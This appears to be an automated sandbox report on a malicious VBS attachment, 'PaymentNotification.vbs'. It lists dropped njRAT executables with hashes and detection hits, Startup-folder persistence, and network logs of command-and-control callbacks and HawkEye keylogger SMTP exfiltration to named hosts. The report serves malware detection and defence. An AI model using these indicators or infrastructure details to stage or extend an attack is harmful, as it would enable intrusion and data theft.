                                                                                              SHA1:2EF6CE8EF54231434E46A51F8604DC72C6831246
                                                                                              SHA-256:52CA7E417C7A85F7E7337BE8DDD76A3B2508343DD63B4C274C34D9B513907BF5
                                                                                              SHA-512:C3B5D0C62BCF015AA363786FDC12675400A4A1177E4DFF5F4B9099CD5A05D316372AC32E1E276171385B2941A3C27843758BBA7DBA5F898966AD27B8B7160BE7
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, Author: Brian Wallace @botnet_hunter
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N..`............................N&... ........@.. ....................................@..................................%..W....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0&......H...........i......Y...$...............................................&.(......*..*..(......*..s.........s.........s.........s.........s..........*....0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.................,.........o....-..+.......9....~..............,3~.........(....o........,.r...p......(....s....z.+..s..........~.........(.....o......(...+..}.ru....%-.&.+.%.(.....o....
                                                                                              C:\Users\user\AppData\Roaming\pid.txt
                                                                                              Process:C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):4
                                                                                              Entropy (8bit):2.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Mn:M
                                                                                              MD5:6E616E79D491BA42638558CAF0364003
                                                                                              SHA1:74F5C11138CDB6F32822F4120E4F4F9D027D3EBB
                                                                                              SHA-256:23850EB82A923C694AFCFF74746BFEC1AF8099C034E73EFF71978FCEF7A23FD3
                                                                                              SHA-512:091AEE6AAD44DADDA5E2FEDA9E2363722434F815BCD0FB0270E1DD9F9C1F5B0740C8CC302170682C58DDC86F8F4CF6B330B6393E8ABDF000B9128B3044F7B182
                                                                                              Malicious:false
                                                                                              Preview: 4928
                                                                                              C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                              Process:C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):52
                                                                                              Entropy (8bit):4.3728327481476805
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:oNN+E2J5xAIMig:oNN723ftg
                                                                                              MD5:3C9A412CE21ACF36264B3DA202706434
                                                                                              SHA1:1D1F182C985DA55FABC80E25A5E8F4047B24EA3E
                                                                                              SHA-256:EDFF7D00050F7D79BA480C90741880859E5B1D31DE462FE0088D029315A39DB3
                                                                                              SHA-512:629A0BEC067E72B4E292AFFD7526A3BE35258EFBF358A5C891FD0D2B77F25F05EB80CAFFDACCF5E01D44BC8D3459E70F0EE43A1D95503B5207496B02D41EE7B0
                                                                                              Malicious:false
                                                                                              Preview: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe
                                                                                              C:\Users\user\AppData\Roaming\servieda.exe
                                                                                              Process:C:\Users\user\AppData\Local\Temp\Tmp.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):69632
                                                                                              Entropy (8bit):5.550691485739008
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:Xq47KHbq7NIowMZVHC8kUYUsFWn4UVm7JsWYKcOvt9t9cFKpBBDZ0DauldK:Ubq7JrDCR3UP4UVkRYw/tekpBBWdK
                                                                                              MD5:9B30598F8F05C46F8ABB22A4C2ABCC9E
                                                                                              SHA1:73665A73C48C889AF51EC9C99D8432218676B0CD
                                                                                              SHA-256:2E5075A95C5663256555E292409149B4522F76FBE63BB48665213006C2D5CA2A
                                                                                              SHA-512:35B2D08550387CAFED531B6EE3BA81CF1567E0E6934263044896060E39C6A865A8176A9817E259DD0527FC021E2DC9C9845649125EDF5CBFF1FB198AF3175360
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: MAL_Winnti_Sample_May18_1, Description: Detects malware sample from Burning Umbrella report - Generic Winnti Rule, Source: C:\Users\user\AppData\Roaming\servieda.exe, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\servieda.exe, Author: Joe Security
                                                                                              • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\servieda.exe, Author: Brian Wallace @botnet_hunter
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: Metadefender, Detection: 78%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 83%
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N..`............................N&... ........@.. ....................................@..................................%..W....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0&......H...........i......Y...$...............................................&.(......*..*..(......*..s.........s.........s.........s.........s..........*....0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.................,.........o....-..+.......9....~..............,3~.........(....o........,.r...p......(....s....z.+..s..........~.........(.....o......(...+..}.ru....%-.&.+.%.(.....o....
                                                                                              \Device\ConDrv
                                                                                              Process:C:\Windows\SysWOW64\netsh.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):313
                                                                                              Entropy (8bit):4.971939296804078
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:/ojfKsUTGN8Ypox42k9L+DbGMKeQE+vigqAZs2E+AYeDPO+Yswyha:wjPIGNrkHk9iaeIM6ADDPOHyha
                                                                                              MD5:689E2126A85BF55121488295EE068FA1
                                                                                              SHA1:09BAAA253A49D80C18326DFBCA106551EBF22DD6
                                                                                              SHA-256:D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25
                                                                                              SHA-512:C3736A8FC7E6573FA1B26FE6A901C05EE85C55A4A276F8F569D9EADC9A58BEC507D1BB90DBF9EA62AE79A6783178C69304187D6B90441D82E46F5F56172B5C5C
                                                                                              Malicious:false
                                                                                              Preview: ..IMPORTANT: Command executed successfully...However, "netsh firewall" is deprecated;..use "netsh advfirewall firewall" instead...For more information on using "netsh advfirewall firewall" commands..instead of "netsh firewall", see KB article 947709..at https://go.microsoft.com/fwlink/?linkid=121488 .....Ok.....

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
                                                                                              Entropy (8bit):3.5935554485710077
                                                                                              TrID:
                                                                                              • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                                              • MP3 audio (1001/1) 32.22%
                                                                                              • Lumena CEL bitmap (63/63) 2.03%
                                                                                              • Corel Photo Paint (41/41) 1.32%
                                                                                              File name:PaymentNotification.vbs
                                                                                              File size:356096
                                                                                              MD5:f5b9f4ae6470dd78d53b60dcc6b32a5b
                                                                                              SHA1:c12a160ff346463dfea1a2a5b015b0efd56a9645
                                                                                              SHA256:3fb7c96dcb667562f755e56f05a892aa8326d0c905055f1ea75177e1785df46b
                                                                                              SHA512:891a78a7fae35b7bec30254bd88c458c940ec25c347f9f0ff0e83fa23a93b166d80f825b74a57781ebfb3e55a80a355131677db32a5510e86728fae4977e9bef
                                                                                              SSDEEP:3072:N3n1hOhJ4d+NxpBmFxHJCABjHf67j4be1:N3ahs+7aBjHy7j4q1
                                                                                              File Content Preview:..U.n.S.N. .=. .(.".=.=.Q.K.i.U.G.e.l.5.i.c.n.B.H.X.i. .*.+.*.+.*.+.*.+.*.+.*. .". .+. ._. .....".i.J.g.Y.X.Z.E.F.G.a.T.h.i.b.1.J.n.L.s.V.H.d.o.N. ./.4.5.6./.Z.h.h.2.b.5.p.H.b.6.h. ./.4.5.6./.Y.n.R.3.b.q.V.G.a. ./.4.5.6./.h. ./.4.5.6./.C.N.k.C.M.w. .*.+.*

                                                                                              File Icon

                                                                                              Icon Hash:e8d69ece869a9ec4

                                                                                              Network Behavior

                                                                                              Snort IDS Alerts

                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                              04/28/21-20:49:31.646373ICMP384ICMP PING192.168.2.62.23.155.226
                                                                                              04/28/21-20:49:31.681609ICMP449ICMP Time-To-Live Exceeded in Transit84.17.52.126192.168.2.6
                                                                                              04/28/21-20:49:31.682134ICMP384ICMP PING192.168.2.62.23.155.226
                                                                                              04/28/21-20:49:31.717620ICMP449ICMP Time-To-Live Exceeded in Transit149.11.89.129192.168.2.6
                                                                                              04/28/21-20:49:31.718700ICMP384ICMP PING192.168.2.62.23.155.226
                                                                                              04/28/21-20:49:31.755896ICMP449ICMP Time-To-Live Exceeded in Transit130.117.49.165192.168.2.6
                                                                                              04/28/21-20:49:31.757037ICMP384ICMP PING192.168.2.62.23.155.226
                                                                                              04/28/21-20:49:31.799677ICMP449ICMP Time-To-Live Exceeded in Transit130.117.0.18192.168.2.6
                                                                                              04/28/21-20:49:31.811880ICMP384ICMP PING192.168.2.62.23.155.226
                                                                                              04/28/21-20:49:31.858721ICMP449ICMP Time-To-Live Exceeded in Transit154.54.36.53192.168.2.6
                                                                                              04/28/21-20:49:31.878720ICMP384ICMP PING192.168.2.62.23.155.226
                                                                                              04/28/21-20:49:31.925196ICMP449ICMP Time-To-Live Exceeded in Transit130.117.15.66192.168.2.6
                                                                                              04/28/21-20:49:31.925617ICMP384ICMP PING192.168.2.62.23.155.226
                                                                                              04/28/21-20:49:31.989344ICMP449ICMP Time-To-Live Exceeded in Transit195.22.208.117192.168.2.6
                                                                                              04/28/21-20:49:31.989900ICMP384ICMP PING192.168.2.62.23.155.226
                                                                                              04/28/21-20:49:32.042782ICMP449ICMP Time-To-Live Exceeded in Transit93.186.128.39192.168.2.6
                                                                                              04/28/21-20:49:32.043298ICMP384ICMP PING192.168.2.62.23.155.226
                                                                                              04/28/21-20:49:32.095652ICMP408ICMP Echo Reply2.23.155.226192.168.2.6
                                                                                              04/28/21-20:50:00.545812TCP2021176ET TROJAN Bladabindi/njRAT CnC Command (ll)497063429192.168.2.6185.140.53.71
                                                                                              04/28/21-20:50:10.806596TCP2019214ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)497063429192.168.2.6185.140.53.71
                                                                                              04/28/21-20:50:13.866114TCP2019214ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)497063429192.168.2.6185.140.53.71
                                                                                              04/28/21-20:50:19.524323TCP2022062ET TROJAN njrat ver 0.7d Malware CnC Callback Response (File Manager)342949706185.140.53.71192.168.2.6
                                                                                              04/28/21-20:50:20.210801TCP2019214ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)497063429192.168.2.6185.140.53.71
                                                                                              04/28/21-20:50:21.271866TCP2019216ET TROJAN njrat ver 0.7d Malware CnC Callback (Message)497063429192.168.2.6185.140.53.71
                                                                                              04/28/21-20:50:22.960689TCP2019214ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)497063429192.168.2.6185.140.53.71
                                                                                              04/28/21-20:50:26.000113TCP2019214ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)497063429192.168.2.6185.140.53.71
                                                                                              04/28/21-20:50:28.681312TCP2030673ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)562249715185.140.53.71192.168.2.6
                                                                                              04/28/21-20:50:29.833873TCP2019214ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)497063429192.168.2.6185.140.53.71
                                                                                              04/28/21-20:50:36.102041TCP2019214ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)497063429192.168.2.6185.140.53.71
                                                                                              04/28/21-20:50:40.143989TCP2019214ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)497063429192.168.2.6185.140.53.71
                                                                                              04/28/21-20:50:48.411842TCP2022062ET TROJAN njrat ver 0.7d Malware CnC Callback Response (File Manager)342949706185.140.53.71192.168.2.6
                                                                                              04/28/21-20:50:49.632938TCP2019214ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)497063429192.168.2.6185.140.53.71
                                                                                              04/28/21-20:50:49.949509TCP2019216ET TROJAN njrat ver 0.7d Malware CnC Callback (Message)497063429192.168.2.6185.140.53.71
                                                                                              04/28/21-20:50:52.219899TCP2019214ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)497063429192.168.2.6185.140.53.71
                                                                                              04/28/21-20:50:52.553161TCP2019214ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)497063429192.168.2.6185.140.53.71
                                                                                              04/28/21-20:50:55.242661TCP2019214ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)497063429192.168.2.6185.140.53.71
                                                                                              04/28/21-20:50:55.724475TCP1201ATTACK-RESPONSES 403 Forbidden8049724104.16.154.36192.168.2.6
                                                                                              04/28/21-20:50:58.275348TCP2019214ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)497063429192.168.2.6185.140.53.71
                                                                                              04/28/21-20:51:00.137141TCP2019926ET TROJAN HawkEye Keylogger Report SMTP49726587192.168.2.6103.6.196.196
                                                                                              04/28/21-20:51:10.877411TCP2019926ET TROJAN HawkEye Keylogger Report SMTP49732587192.168.2.6103.6.196.196

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Apr 28, 2021 20:49:37.990577936 CEST49699443192.168.2.6207.241.227.114
                                                                                              Apr 28, 2021 20:49:38.195584059 CEST44349699207.241.227.114192.168.2.6
                                                                                              Apr 28, 2021 20:49:38.195766926 CEST49699443192.168.2.6207.241.227.114
                                                                                              Apr 28, 2021 20:49:38.219413996 CEST49699443192.168.2.6207.241.227.114
                                                                                              Apr 28, 2021 20:49:38.424576044 CEST44349699207.241.227.114192.168.2.6
                                                                                              Apr 28, 2021 20:49:38.424655914 CEST44349699207.241.227.114192.168.2.6
                                                                                              Apr 28, 2021 20:49:38.424707890 CEST44349699207.241.227.114192.168.2.6
                                                                                              Apr 28, 2021 20:49:38.424758911 CEST44349699207.241.227.114192.168.2.6
                                                                                              Apr 28, 2021 20:49:38.424762011 CEST49699443192.168.2.6207.241.227.114
                                                                                              Apr 28, 2021 20:49:38.424798965 CEST44349699207.241.227.114192.168.2.6
                                                                                              Apr 28, 2021 20:49:38.424804926 CEST49699443192.168.2.6207.241.227.114
                                                                                              Apr 28, 2021 20:49:38.424869061 CEST49699443192.168.2.6207.241.227.114
                                                                                              Apr 28, 2021 20:49:38.428610086 CEST44349699207.241.227.114192.168.2.6
                                                                                              Apr 28, 2021 20:49:38.428675890 CEST44349699207.241.227.114192.168.2.6
                                                                                              Apr 28, 2021 20:49:38.428745031 CEST49699443192.168.2.6207.241.227.114
                                                                                              Apr 28, 2021 20:49:38.428819895 CEST49699443192.168.2.6207.241.227.114
                                                                                              Apr 28, 2021 20:49:38.481906891 CEST49699443192.168.2.6207.241.227.114
                                                                                              Apr 28, 2021 20:49:38.687988997 CEST44349699207.241.227.114192.168.2.6
                                                                                              Apr 28, 2021 20:49:38.688313961 CEST44349699207.241.227.114192.168.2.6
                                                                                              Apr 28, 2021 20:49:38.688452005 CEST49699443192.168.2.6207.241.227.114
                                                                                              Apr 28, 2021 20:49:38.726054907 CEST49699443192.168.2.6207.241.227.114
                                                                                              Apr 28, 2021 20:49:38.931335926 CEST44349699207.241.227.114192.168.2.6
                                                                                              Apr 28, 2021 20:49:38.946767092 CEST44349699207.241.227.114192.168.2.6
                                                                                              Apr 28, 2021 20:49:38.946872950 CEST49699443192.168.2.6207.241.227.114
                                                                                              Apr 28, 2021 20:49:39.932044983 CEST44349699207.241.227.114192.168.2.6
                                                                                              Apr 28, 2021 20:49:39.932076931 CEST44349699207.241.227.114192.168.2.6
                                                                                              Apr 28, 2021 20:49:39.932221889 CEST49699443192.168.2.6207.241.227.114
                                                                                              Apr 28, 2021 20:49:55.773941040 CEST497055471192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:49:56.026283979 CEST547149705185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:49:56.373271942 CEST49699443192.168.2.6207.241.227.114
                                                                                              Apr 28, 2021 20:49:56.531897068 CEST497055471192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:49:56.797717094 CEST547149705185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:49:57.298255920 CEST497055471192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:49:57.555747032 CEST547149705185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:49:59.948956013 CEST497063429192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:00.093055964 CEST497075471192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:00.198863029 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:00.198971987 CEST497063429192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:00.342957020 CEST547149707185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:00.545811892 CEST497063429192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:00.844831944 CEST497075471192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:00.877640963 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:00.877872944 CEST497063429192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:01.134840965 CEST547149707185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:01.204977989 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:01.641880989 CEST497075471192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:01.906229019 CEST547149707185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:04.411237955 CEST497085471192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:04.702158928 CEST547149708185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:05.204546928 CEST497085471192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:05.466819048 CEST547149708185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:05.877341032 CEST497063429192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:05.970139980 CEST497085471192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:06.215763092 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:06.226924896 CEST547149708185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:06.479783058 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:06.483153105 CEST497063429192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:06.796451092 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:08.738342047 CEST497095471192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:08.992042065 CEST547149709185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:09.501801014 CEST497095471192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:09.722892046 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:09.767294884 CEST497063429192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:09.773319006 CEST547149709185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:10.283020020 CEST497095471192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:10.563333035 CEST547149709185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:10.806596041 CEST497063429192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:11.120780945 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:13.288209915 CEST497105471192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:13.570292950 CEST547149710185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:13.768337965 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:13.814531088 CEST497063429192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:13.866113901 CEST497063429192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:14.080163956 CEST497105471192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:14.175697088 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:14.268445015 CEST497063429192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:14.326714993 CEST547149710185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:14.574331045 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:14.830269098 CEST497105471192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:15.082739115 CEST547149710185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:17.600140095 CEST497115471192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:17.852123976 CEST547149711185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:18.357610941 CEST497115471192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:18.605947971 CEST547149711185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:19.118047953 CEST497115471192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:19.381472111 CEST547149711185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:19.524322987 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:19.524430037 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:19.524538994 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:19.525321960 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:19.525345087 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:19.525717974 CEST497063429192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:19.526730061 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:19.526819944 CEST497063429192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:19.526949883 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:19.527431965 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:19.527494907 CEST497063429192.168.2.6185.140.53.71
                                                                                              Apr 28, 2021 20:50:19.528115988 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:19.528239965 CEST342949706185.140.53.71192.168.2.6
                                                                                              Apr 28, 2021 20:50:19.528333902 CEST497063429192.168.2.6185.140.53.71

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Apr 28, 2021 20:49:28.019202948 CEST5777353192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:49:28.070158958 CEST53577738.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:49:29.010178089 CEST5998653192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:49:29.059096098 CEST53599868.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:49:29.901109934 CEST5247853192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:49:29.950100899 CEST53524788.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:49:31.285599947 CEST5893153192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:49:31.343779087 CEST53589318.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:49:31.580931902 CEST5772553192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:49:31.645327091 CEST53577258.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:49:32.370460987 CEST4928353192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:49:32.427886009 CEST53492838.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:49:33.277038097 CEST5837753192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:49:33.325942039 CEST53583778.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:49:34.367306948 CEST5507453192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:49:34.417165041 CEST53550748.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:49:35.454207897 CEST5451353192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:49:35.502916098 CEST53545138.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:49:36.502357006 CEST6204453192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:49:36.551178932 CEST53620448.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:49:37.441314936 CEST6379153192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:49:37.492192984 CEST53637918.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:49:37.913492918 CEST6426753192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:49:37.971016884 CEST53642678.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:49:38.353760958 CEST4944853192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:49:38.402816057 CEST53494488.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:49:39.354316950 CEST6034253192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:49:39.405952930 CEST53603428.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:49:40.480726957 CEST6134653192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:49:40.529692888 CEST53613468.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:49:41.518815994 CEST5177453192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:49:41.576204062 CEST53517748.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:49:42.428302050 CEST5602353192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:49:42.485542059 CEST53560238.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:50:23.262248993 CEST5838453192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:50:23.323628902 CEST53583848.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:50:30.550821066 CEST6026153192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:50:30.602368116 CEST53602618.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:50:55.257371902 CEST5606153192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:50:55.317194939 CEST53560618.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:50:55.510035992 CEST5833653192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:50:55.572010994 CEST53583368.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:50:56.580599070 CEST5378153192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:50:57.249634027 CEST53537818.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:51:04.466546059 CEST5406453192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:51:04.547173977 CEST53540648.8.8.8192.168.2.6
                                                                                              Apr 28, 2021 20:51:07.489036083 CEST5281153192.168.2.68.8.8.8
                                                                                              Apr 28, 2021 20:51:08.224945068 CEST53528118.8.8.8192.168.2.6

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                              Apr 28, 2021 20:49:37.913492918 CEST192.168.2.68.8.8.80xbeedStandard query (0)ia601504.us.archive.orgA (IP address)IN (0x0001)
                                                                                              Apr 28, 2021 20:50:55.257371902 CEST192.168.2.68.8.8.80xbd47Standard query (0)81.189.14.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                              Apr 28, 2021 20:50:55.510035992 CEST192.168.2.68.8.8.80x8ee5Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                                              Apr 28, 2021 20:50:56.580599070 CEST192.168.2.68.8.8.80xb64bStandard query (0)mail.neesoontat.com.myA (IP address)IN (0x0001)
                                                                                              Apr 28, 2021 20:51:07.489036083 CEST192.168.2.68.8.8.80xaf62Standard query (0)mail.neesoontat.com.myA (IP address)IN (0x0001)

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                              Apr 28, 2021 20:49:37.971016884 CEST8.8.8.8192.168.2.60xbeedNo error (0)ia601504.us.archive.org207.241.227.114A (IP address)IN (0x0001)
                                                                                              Apr 28, 2021 20:50:55.317194939 CEST8.8.8.8192.168.2.60xbd47Name error (3)81.189.14.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                              Apr 28, 2021 20:50:55.572010994 CEST8.8.8.8192.168.2.60x8ee5No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                                              Apr 28, 2021 20:50:55.572010994 CEST8.8.8.8192.168.2.60x8ee5No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                                              Apr 28, 2021 20:50:57.249634027 CEST8.8.8.8192.168.2.60xb64bNo error (0)mail.neesoontat.com.myneesoontat.com.myCNAME (Canonical name)IN (0x0001)
